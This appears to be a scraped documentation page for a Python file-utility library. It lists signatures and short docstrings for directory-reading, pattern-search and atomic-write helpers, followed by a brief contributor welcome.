*   def directory\_files\_details(directory\_path: str, \*, recursive: bool \= False) \-> Dict\[str, Dict\[str, Union\[str, int\]\]\]:
        """Return the file details for each file in the directory at the given path."""
    
*   def directory\_files\_read(directory\_path: str, \*, recursive: bool \= False) \-> Iterable\[Tuple\[str, str\]\]:
        """Read all files in the directory\_path."""
    
*   def directory\_subdirectory\_names(directory\_path: str, \*, recursive: bool \= False) \-> List\[str\]:
        """List the names of all subdirectories in the given directory."""
    
*   def directory\_files\_containing(
        directory\_path: str, pattern: str, \*, pattern\_is\_regex: bool \= False, recursive: bool \= False
    ) \-> Dict\[str, List\[str\]\]:
        """Search for the given pattern in all files in the given directory\_path."""
    
*   def directory\_file\_paths\_matching(directory\_path: str, pattern: str, \*, recursive: bool \= False) \-> List\[str\]:
        """Return the paths of all of the files in the given directory which match the pattern."""
    
*   def directory\_file\_names\_matching(directory\_path: str, pattern: str, \*, recursive: bool \= False) \-> List\[str\]:
        """Return the names of all of the files in the given directory which match the pattern."""
    
*   def directory\_read\_files\_with\_path\_matching(
        directory\_path: str, pattern: str, \*, recursive: bool \= False
    ) \-> Iterable\[Tuple\[str, str\]\]:
        """Read all of the files in the given directory whose paths match the given pattern."""
    
*   def atomic\_write(fpath, \*, overwrite: bool \= True, \*\*cls\_kwargs):
        """Create a context manager to write atomically using the AtomicWriterPerms class to update file permissions."""
    

👋  If you want to get involved in this project, we have some short, helpful guides below:

If you have any questions or there is anything we did not cover, please raise an issue and we'll be happy to help.

Tag

#windows